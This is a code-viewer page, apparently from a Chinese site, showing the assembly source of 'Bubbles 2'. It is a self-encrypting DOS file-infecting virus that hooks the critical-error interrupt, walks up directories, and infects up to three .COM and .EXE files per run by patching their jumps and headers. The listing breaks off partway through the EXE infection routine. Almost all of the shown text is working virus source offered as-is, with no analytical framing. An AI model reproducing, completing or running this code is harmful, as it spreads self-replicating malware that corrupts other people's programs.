📄 bubbles2.asm
字号:
;---------
; Bubbles 2 written by Admiral Bailey
;---------
Code Segment Public 'Code'
Assume CS:Code
Org 100h ; All .COM files start here
ID = 'AB' ; Id for infected files
MaxFiles = 3 ; Max number of file to infect
Start:
db 0e9h,2,0 ; Jump to the next command
dw id ; So this file doesnt get infected
Virus:
call realcode ; Push current location on stack
Realcode:
pop bp ; Get location off stack
nop
nop
nop
sub bp,offset realcode ; Adjust it for our pointer
nop
nop
call encrypt_decrypt ; Decrypt the virus first
Encrypt_Start equ $ ; From here is encrypted
cmp sp,id ; Is this file a COM or EXE?
je restoreEXE ; Its an EXE so restore it
lea si,[bp+offset oldjump] ; Location of old jump in si
mov di,100h ; Restore new jump to 100h
push di ; Save so we could just return when done
movsb ; Move a byte
movsw ; Move a word
movsw ; Move another word
jmp exitrestore
RestoreEXE:
push ds ; Save ExE ds
push es ; Save ExE es
push cs
pop ds ; DS now equals CS
push cs
pop es ; ES now equals CS
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word
ExitRestore:
lea dx,[bp+offset dta] ; Where to put New DTA
call set_DTA ; Move it
mov [bp+counter],byte ptr 0 ; Clear counter
mov ax,3524h ; Get int 24 handler
int 21h ; It gets put in ES:BX
mov word ptr [bp+oldint24],bx ; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; Loc of new one in DS:DX
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
mov ah,47h ; Get the current directory
mov dl,0h ; On current drive
lea si,[bp+offset currentdir] ; Where to keep it
int 21h
DirLoop:
lea dx,[bp+offset exefilespec] ; Files to look for
call findfirst
lea dx,[bp+offset comfilespec] ; Files to look for
call findfirst
lea dx,[bp+offset directory] ; Where to change too '..'
mov ah,3bh ; Change directory
int 21h
jnc dirloop ; If no problems the look for files
call activate ; Call the activation routine
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; To original
int 21h
push cs
pop ds ; Do this because the DS gets changed
lea dx,[bp+offset currentdir] ; Location Of original dir
mov ah,3bh ; Change to there
int 21h
mov dx,80h ; Location of original DTA
call set_dta ; Put it back there
cmp sp,id-4 ; Is this file an EXE or COM?
jz returnEXE ; Its an EXE!
retn ; Return to 100h (original jump)
ReturnEXE:
pop es ; Get original ES
pop ds ; Get original DS
mov ax,es
add ax,10h
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear int's because of stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
db 0eah ; Jump ssss:oooo
jmpsave dd ? ; Jump location
stacksave dd ? ; Original cs:ip
jmpsave2 dd 0fff00000h
stacksave2 dd ?
FindFirst:
cmp [bp+counter],maxfiles ; Have we infected Too many
ja quit ; Yup
mov ah,4eh ; Find first file
mov cx,7 ; Find all attributes
FindNext:
int 21h ; Find first/next file int
jc quit ; If none found then change dir
call infection ; Infect that file
FindNext2:
mov ah,4fh ; Find next file
jmp findnext ; Jump to the loop
Quit:
ret
Infection:
mov ax,3d00h ; Open file for read only
call open
mov ah,3fh ; Read from file
mov cx,1ah ; Number of bytes
lea dx,[bp+offset buffer] ; Location to store them
int 21h
mov ah,3eh ; Close file
int 21h
mov ax,word ptr [bp+DTA+1Ah] ; Get filesize from DTA
cmp ax,64000 ; Is the file too large?
ja quitinfect ; file to large so getanother
cmp ax,600 ; Is the file too small?
jb quitinfect ; file to small so getanother
cmp word ptr [bp+buffer],'ZM' ; Is file found an EXE?
jz checkEXE ; Yup so check it
mov ax,word ptr [bp+DTA+35] ; Get end of file name in ax
cmp ax,'DN' ; Does it end in 'ND'?
jz quitinfect ; Yup so get another file
CheckCom:
mov bx,word ptr [bp+offset dta+1ah] ; Get file size
cmp word ptr cs:[bp+buffer+3],id ; Check for ID
je quitinfect
jmp infectcom
CheckExe:
cmp word ptr [bp+buffer+10h],id ; Check EXE for infection
jz quitinfect ; Already infected so close up
jmp infectexe
QuitInfect:
ret
InfectCom:
sub bx,3 ; Adjust for new jump
lea si,[bp+buffer] ; Move the old jump first
lea di,[bp+oldjump]
movsb
movsw
movsw
mov [bp+buffer],byte ptr 0e9h ; Setup new jump
mov word ptr [bp+buffer+1],bx ; Save new jump
mov word ptr [bp+buffer+3],id ; Put in ID
mov cx,5 ; Number of bytes to write
jmp finishinfection
InfectExe:
les ax,dword ptr [bp+buffer+14h] ; Load es with seg address
mov word ptr [bp+jmpsave2],ax ; save old cs:ip
mov word ptr [bp+jmpsave2+2],es
les ax,dword ptr [bp+buffer+0eh] ; save old ss:sp
mov word ptr [bp+stacksave2],es ; save old cs:ip
mov word ptr [bp+stacksave2+2],ax
mov ax, word ptr [bp+buffer+8] ; get header size
mov cl,4
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -